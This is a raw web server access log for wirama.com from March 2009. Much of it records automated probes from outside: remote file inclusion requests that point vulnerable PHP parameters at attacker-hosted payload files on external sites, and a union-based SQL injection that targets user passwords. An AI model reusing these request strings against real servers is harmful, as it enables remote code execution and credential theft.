65.55.208.63 - - [30/Mar/2009:17:00:26 -0700] "GET /logs/ HTTP/1.1" 200 1523 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
132.204.108.18 - - [30/Mar/2009:17:27:57 -0700] "GET /logs/access_090101.log HTTP/1.1" 200 7270 "http://www.google.ca/search?q=GET+%2Frobots.txt+HTTP%2F1.1%22+404+&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:fr:official&client=firefox-a" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5 (.NET CLR 3.5.30729)" "www.wirama.com"
132.204.108.18 - - [30/Mar/2009:17:27:57 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5 (.NET CLR 3.5.30729)" "wirama.com"
66.110.213.7 - - [30/Mar/2009:17:35:32 -0700] "GET /logs/access_090301.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://cashlinkclearinghouse.com/v6.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "wirama.com"
66.110.213.7 - - [30/Mar/2009:17:35:32 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://cashlinkclearinghouse.com/v6.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "wirama.com"
66.110.213.7 - - [30/Mar/2009:17:35:32 -0700] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://cashlinkclearinghouse.com/v6.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "wirama.com"
95.105.130.129 - - [30/Mar/2009:17:43:40 -0700] "GET /pr02.htm HTTP/1.1" 404 275 "-" "-" "www.wirama.com"
203.25.170.25 - - [30/Mar/2009:17:48:36 -0700] "GET /logs//components/errors.php?error=http://szulga.com/library/v4id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
203.25.170.25 - - [30/Mar/2009:17:48:36 -0700] "GET /components/errors.php?error=http://szulga.com/library/v4id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
213.23.82.239 - - [30/Mar/2009:18:43:50 -0700] "GET / HTTP/1.1" 200 916 "http://www.google.com/search?q=wirama&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3" "www.wirama.com"
213.23.82.239 - - [30/Mar/2009:18:43:51 -0700] "GET / HTTP/1.1" 200 916 "http://www.google.com/search?q=wirama&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3" "www.wirama.com"
213.23.82.239 - - [30/Mar/2009:18:43:52 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3" "wirama.com"
213.23.82.239 - - [30/Mar/2009:18:43:52 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3" "wirama.com"
213.23.82.239 - - [30/Mar/2009:18:44:15 -0700] "GET /files/series_A.pdf HTTP/1.1" 404 275 "http://venturebeat.com/2007/02/28/wirama-wireless-rfid-co-raises-first-round-of-funding/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3" "www.wirama.com"
65.55.208.50 - - [30/Mar/2009:19:05:52 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.50 - - [30/Mar/2009:19:05:54 -0700] "GET /_private/?S=A HTTP/1.1" 200 675 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
24.5.193.71 - - [30/Mar/2009:19:11:28 -0700] "GET / HTTP/1.1" 200 916 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8 (.NET CLR 3.5.30729)" "www.wirama.com"
24.5.193.71 - - [30/Mar/2009:19:11:28 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8 (.NET CLR 3.5.30729)" "wirama.com"
24.5.193.71 - - [30/Mar/2009:19:11:30 -0700] "GET / HTTP/1.1" 200 916 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8 (.NET CLR 3.5.30729)" "www.wirama.com"
24.5.193.71 - - [30/Mar/2009:19:11:31 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8 (.NET CLR 3.5.30729)" "wirama.com"
24.5.193.71 - - [30/Mar/2009:19:11:32 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8 (.NET CLR 3.5.30729)" "wirama.com"
77.222.40.87 - - [30/Mar/2009:19:13:43 -0700] "GET /logs/access.log/?board=free&act=http://www.planete-riviere.com/hk? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
77.222.40.87 - - [30/Mar/2009:19:13:43 -0700] "GET /?board=free&act=http://www.planete-riviere.com/hk? HTTP/1.1" 200 916 "-" "libwww-perl/5.805" "www.wirama.com"
77.222.40.87 - - [30/Mar/2009:19:13:43 -0700] "GET /logs/?board=free&act=http://www.planete-riviere.com/hk? HTTP/1.1" 200 1659 "-" "libwww-perl/5.805" "www.wirama.com"
12.145.177.110 - - [30/Mar/2009:19:24:06 -0700] "GET /logs/access.log HTTP/1.1" 200 5188 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "wirama.com"
71.130.221.106 - - [30/Mar/2009:19:38:33 -0700] "GET / HTTP/1.1" 200 916 "http://socal.terapad.com/index.cfm?fa=contentNews.news&directoryId=4454" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)" "www.wirama.com"
71.130.221.106 - - [30/Mar/2009:19:38:34 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)" "wirama.com"
209.90.77.57 - - [30/Mar/2009:20:39:44 -0700] "GET /components/com_mambowiki/%20MamboLogin.php?IP=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
209.90.77.57 - - [30/Mar/2009:20:39:45 -0700] "GET /logs//components/com_mambowiki/%20MamboLogin.php?IP=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
209.90.77.57 - - [30/Mar/2009:20:39:46 -0700] "GET /logs/access_090301.log//components/com_mambowiki/%20MamboLogin.php?IP=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
209.90.77.57 - - [30/Mar/2009:20:39:48 -0700] "GET /logs//components/com_mambowiki/%20MamboLogin.php?IP=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
209.90.77.57 - - [30/Mar/2009:20:39:48 -0700] "GET /logs/access_090301.log//components/com_mambowiki/%20MamboLogin.php?IP=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
209.90.77.57 - - [30/Mar/2009:20:39:48 -0700] "GET /components/com_mambowiki/%20MamboLogin.php?IP=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
202.53.250.24 - - [30/Mar/2009:20:42:50 -0700] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.racers.co.kr/cc/Debug/fatal1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
202.53.250.24 - - [30/Mar/2009:20:42:50 -0700] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.racers.co.kr/cc/Debug/fatal1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
202.53.250.24 - - [30/Mar/2009:20:42:50 -0700] "GET /logs/access.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.racers.co.kr/cc/Debug/fatal1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
119.235.22.22 - - [30/Mar/2009:21:16:16 -0700] "GET /index.php?option=com_simpleboard&func=view&catid=-999+union+select+2,2,3,concat(0x3a,0x3a,username,0x3a,password),5+from+mos_users/* HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
119.235.22.22 - - [30/Mar/2009:21:16:16 -0700] "GET /logs/access.log/index.php?option=com_simpleboard&func=view&catid=-999+union+select+2,2,3,concat(0x3a,0x3a,username,0x3a,password),5+from+mos_users/* HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
119.235.22.22 - - [30/Mar/2009:21:16:16 -0700] "GET /logs/index.php?option=com_simpleboard&func=view&catid=-999+union+select+2,2,3,concat(0x3a,0x3a,username,0x3a,password),5+from+mos_users/* HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
94.75.253.85 - - [30/Mar/2009:22:09:23 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "wirama.com"
94.75.253.85 - - [30/Mar/2009:22:09:23 -0700] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "wirama.com"
93.95.217.45 - - [30/Mar/2009:22:10:51 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "wirama.com"
93.95.217.45 - - [30/Mar/2009:22:10:52 -0700] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "wirama.com"
94.75.253.85 - - [30/Mar/2009:22:28:42 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "wirama.com"
94.75.253.85 - - [30/Mar/2009:22:28:42 -0700] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "wirama.com"
93.95.217.45 - - [30/Mar/2009:22:29:21 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "wirama.com"
93.95.217.45 - - [30/Mar/2009:22:29:21 -0700] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "wirama.com"
65.98.60.170 - - [30/Mar/2009:22:34:44 -0700] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.c868z.cn/FX29ID1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.98.60.170 - - [30/Mar/2009:22:34:44 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.c868z.cn/FX29ID1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.98.60.170 - - [30/Mar/2009:22:34:44 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.c868z.cn/FX29ID1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.98.60.170 - - [30/Mar/2009:22:35:29 -0700] "GET /logs/access_090301.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.c868z.cn/FX29ID1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
60.50.77.10 - - [30/Mar/2009:22:40:21 -0700] "GET / HTTP/1.1" 200 916 "http://www.google.com/search?q=wirama&sourceid=navclient-ff&ie=UTF-8&rls=GGGL,GGGL:2006-32,GGGL:en" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20" "www.wirama.com"
78.111.80.24 - - [30/Mar/2009:22:48:38 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.c868z.cn/FX29ID1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
78.111.80.24 - - [30/Mar/2009:22:48:38 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.c868z.cn/FX29ID1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
78.111.80.24 - - [30/Mar/2009:22:48:38 -0700] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.c868z.cn/FX29ID1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
78.111.80.24 - - [30/Mar/2009:22:50:03 -0700] "GET /logs/access_090301.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.c868z.cn/FX29ID1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.55.208.46 - - [30/Mar/2009:23:02:00 -0700] "GET /pr02.htm HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
219.85.63.226 - - [30/Mar/2009:23:24:07 -0700] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.altem.be/mambots/ts?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.wirama.com"
219.85.63.226 - - [30/Mar/2009:23:24:07 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.altem.be/mambots/ts?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.wirama.com"
219.85.63.226 - - [30/Mar/2009:23:31:30 -0700] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.altem.be/mambots/ts?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.wirama.com"
219.85.63.226 - - [30/Mar/2009:23:31:30 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.altem.be/mambots/ts?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.wirama.com"
219.85.63.226 - - [30/Mar/2009:23:35:41 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.altem.be/mambots/ts?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.wirama.com"
219.85.63.226 - - [30/Mar/2009:23:35:41 -0700] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.altem.be/mambots/ts?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.wirama.com"
205.234.134.66 - - [30/Mar/2009:23:36:26 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.aalesundby.no/rid??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "wirama.com"
205.234.134.66 - - [30/Mar/2009:23:36:26 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.aalesundby.no/rid??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "wirama.com"
205.234.134.66 - - [30/Mar/2009:23:36:30 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.aalesundby.no/rid??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "wirama.com"
205.234.134.66 - - [30/Mar/2009:23:36:31 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.aalesundby.no/rid??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "wirama.com"
208.116.53.212 - - [30/Mar/2009:23:37:24 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://abaa.altervista.org/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "wirama.com"
208.116.53.212 - - [30/Mar/2009:23:37:24 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://abaa.altervista.org/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "wirama.com"
114.111.36.26 - - [30/Mar/2009:23:43:51 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/customer_webtxt_02.jsp)" "www.wirama.com"
114.111.36.26 - - [30/Mar/2009:23:44:06 -0700] "GET / HTTP/1.1" 200 916 "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/customer_webtxt_02.jsp)" "www.wirama.com"
219.85.63.226 - - [31/Mar/2009:00:04:00 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.altem.be/mambots/ts?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.wirama.com"
219.85.63.226 - - [31/Mar/2009:00:04:00 -0700] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.altem.be/mambots/ts?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.wirama.com"
70.87.152.58 - - [31/Mar/2009:00:08:58 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.esoterikha.com/cms/admin/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
70.87.152.58 - - [31/Mar/2009:00:08:58 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.esoterikha.com/cms/admin/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
219.85.63.226 - - [31/Mar/2009:00:11:41 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.altem.be/mambots/ts?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.wirama.com"
219.85.63.226 - - [31/Mar/2009:00:11:41 -0700] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.altem.be/mambots/ts?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.wirama.com"
74.6.22.101 - - [31/Mar/2009:00:18:31 -0700] "GET /?N=D HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
74.52.100.226 - - [31/Mar/2009:00:54:14 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.festiwal.zhp.info//components/Scanid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "wirama.com"
74.52.100.226 - - [31/Mar/2009:00:54:15 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.festiwal.zhp.info//components/Scanid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "wirama.com"
72.172.213.99 - - [31/Mar/2009:00:55:33 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://pakmin.yourfreehosting.net/id.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
72.172.213.99 - - [31/Mar/2009:00:55:33 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://pakmin.yourfreehosting.net/id.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
74.6.22.101 - - [31/Mar/2009:00:59:06 -0700] "GET /?M=A HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
74.52.100.226 - - [31/Mar/2009:01:01:57 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "wirama.com"
74.52.100.226 - - [31/Mar/2009:01:01:57 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "wirama.com"
208.116.53.212 - - [31/Mar/2009:01:03:25 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://abaa.altervista.org/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "wirama.com"
208.116.53.212 - - [31/Mar/2009:01:03:25 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://abaa.altervista.org/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "wirama.com"
140.130.101.5 - - [31/Mar/2009:01:04:54 -0700] "GET /logs//board/kboard.php?board=notice&act=view&no=27///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.creatavision.com/creative-manifesting-smf/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
140.130.101.5 - - [31/Mar/2009:01:04:54 -0700] "GET /board/kboard.php?board=notice&act=view&no=27///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.creatavision.com/creative-manifesting-smf/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
140.130.101.5 - - [31/Mar/2009:01:04:54 -0700] "GET /logs/access.log//board/kboard.php?board=notice&act=view&no=27///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.creatavision.com/creative-manifesting-smf/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
140.130.101.5 - - [31/Mar/2009:01:05:11 -0700] "GET /logs//board/kboard.php?board=notice&act=view&no=27///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.creatavision.com/creative-manifesting-smf/id.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
140.130.101.5 - - [31/Mar/2009:01:05:11 -0700] "GET /logs/access.log//board/kboard.php?board=notice&act=view&no=27///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.creatavision.com/creative-manifesting-smf/id.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
140.130.101.5 - - [31/Mar/2009:01:05:11 -0700] "GET /board/kboard.php?board=notice&act=view&no=27///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.creatavision.com/creative-manifesting-smf/id.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.55.208.61 - - [31/Mar/2009:01:17:36 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.61 - - [31/Mar/2009:01:17:36 -0700] "GET /tmp/ HTTP/1.1" 200 520 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
74.6.22.101 - - [31/Mar/2009:01:26:03 -0700] "GET /tmp/?S=D HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
219.85.63.226 - - [31/Mar/2009:01:26:03 -0700] "GET /common/classes/class_HeaderHandler.lib.php?CFG[site][project_path]=http://www.altem.be/mambots/ts?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.wirama.com"
219.85.63.226 - - [31/Mar/2009:01:26:03 -0700] "GET /logs/common/classes/class_HeaderHandler.lib.php?CFG[site][project_path]=http://www.altem.be/mambots/ts?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.wirama.com"
65.55.208.59 - - [31/Mar/2009:01:36:19 -0700] "GET /logs/?D=D HTTP/1.1" 200 1659 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
64.118.84.7 - - [31/Mar/2009:02:16:39 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.ybrt.cn/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "wirama.com"
64.118.84.7 - - [31/Mar/2009:02:16:39 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.ybrt.cn/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "wirama.com"
65.98.60.170 - - [31/Mar/2009:02:20:52 -0700] "GET /logs/access_090301.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.c868z.cn/FX29ID1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.98.60.170 - - [31/Mar/2009:02:20:52 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.c868z.cn/FX29ID1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.98.60.170 - - [31/Mar/2009:02:20:52 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.c868z.cn/FX29ID1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
78.111.80.24 - - [31/Mar/2009:02:25:02 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.c868z.cn/FX29ID1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
78.111.80.24 - - [31/Mar/2009:02:25:02 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.c868z.cn/FX29ID1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
78.111.80.24 - - [31/Mar/2009:02:25:02 -0700] "GET /logs/access_090301.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.c868z.cn/FX29ID1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
219.85.63.226 - - [31/Mar/2009:02:34:55 -0700] "GET /logs/bbs.htm?urlkey=http://www.altem.be/mambots/ts?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.wirama.com"
219.85.63.226 - - [31/Mar/2009:02:34:56 -0700] "GET /bbs.htm?urlkey=http://www.altem.be/mambots/ts?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.wirama.com"
